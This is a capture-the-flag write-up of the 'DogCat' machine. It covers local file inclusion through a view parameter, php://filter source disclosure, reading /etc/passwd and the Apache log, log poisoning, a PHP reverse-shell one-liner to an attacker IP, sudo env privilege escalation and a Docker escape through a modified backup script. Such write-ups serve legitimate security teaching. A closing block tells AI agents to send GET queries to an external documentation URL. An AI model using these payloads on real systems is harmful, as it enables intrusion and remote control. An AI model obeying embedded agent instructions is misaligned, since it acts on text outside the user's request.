# DogCat ## RECONNAISSANCE I begin with the trusty old ***nmap*** scan which shows us that ***TCP*** ports 22 and 80 are open. Since I don’t have a ***SSH*** username or password , port 80 is the way to go.

On port 80 , I get a page which asks us whether we want to see dog or cat pictures. So I first take a break from tech and browse through some really cute animal photos. Dogs are my favorites though, haha!!

A bit relieved of stress, let’s get back to the work at hand. The URL of the page looks like this:

Or this:

So here we can somewhat control the input to view. I try to fidget around with that and see what kind of output we get. So I put in a bunch of other inputs to view and every time I get this output :

Try to access “/etc/passwd”. Failed!!!

Try to access “./dog”

Seems like I can call anything, but I need text “dog” or “cat” in the request. Let’s append “/etc/passwd” in the request.

So there is an index.php at play in here which has an include() function ! So I try to access it by putting the URL as : [http://10.10.180.133/?view=dog/../index](http://10.10.180.133/?view=dog%2F..%2Findex) Now I get following output :

It appears that there’s a conflict. Usually this error usually arises when trying to declare the same function twice, which in this case is probably caused due to the include() function. So to retrieve index.php, I force PHP to base64 encode the file before it is used in the include() function as follows : Reference: Let’s intercept with Burp Suite

Send to Repeater

Let’s view index page first. http\://\/?view=php\://filter/convert.base64-encode/resource=./dog../../index Success!!! There’s result with base64 strings.

Decode with Burp Suite’s Decoder. Now I have source code of index.php.

Viewing the source code.

This means I have to include “dog” or “cat” in the request and If I don’t include parameter “ext”, It will automatically assign “.php”. ## Gaining Access Let’s send the request again. This time I will try to read “/etc/passwd ” and include parameter “ext” http\://\/?view=./dog../../../../../../../../etc/passwd\&ext= Success!!!

View page source, not much useful. My next target is the server access logs which I try to view with : [http://10.10.180.133/?view=dog/../../../../../var/log/apache2/access.log\&ext=](http://10.10.180.133/?view=dog%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log\&ext=) Just as I expected , I get the contents of access.log as follows :

Now I try a bit of command execution. For starters to try feed ls -la into view : [http://10.10.180.133/?view=ls%20-la\&ext=](http://10.10.180.133/?view=ls+-la\&ext=) However , I get back the same initial page where we had to chose between dogs and cats.

To inspect further , I check our access.log as previously shown. The last line gives us information about the last command we entered. Two crucial things I notice here are the facts that whatever command we put in view is being encoded and hence not executed and that our user agent isn’t being done so . So what if I can write some executable PHP code into our user agent :} Let’s add command Edit User-Agent to be: \ Send the request as: /?view=./dog../../../../../../../../var/log/apache2/access.log\&ext=\&cmd=id

Shows us the user-id (www-data) which means it worked. Let’s get the reverse shell. Create listener

Use Burp Suite to encode command as URL I tried a couple of commands from: Since this site is php, This time I will use php command. php -r ‘$sock=fsockopen(“10.9.3.51”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’ Use Burp Suite to encode command as URL

Copy to the request and send.

Back to listener, Now I have a shell.

Let’s explore the machine. Now I have first flag.

There’s flag2 in “/var/www”.

I explore further and can’t find anything else. ## Privilege Escalation Let’s verify if I can use sudo command. I can use “env”.

Root command reference: Now I’m root.

Now I have flag3.

Let’s explore the machine furthermore to find last flag. Nothing at first. But I keep exploring all possibilities using known linux folders and files.

There’s backups directory This “backup.sh” s interesting.

This machine have a docker. Let’s bypass it Create another reverse shell

Replace former script in backup.sh with reverse shell

Back to listener and wait for awhile. Now I have another shell.

There’s forth flag.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://foothold.gitbook.io/blog/dogcat.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.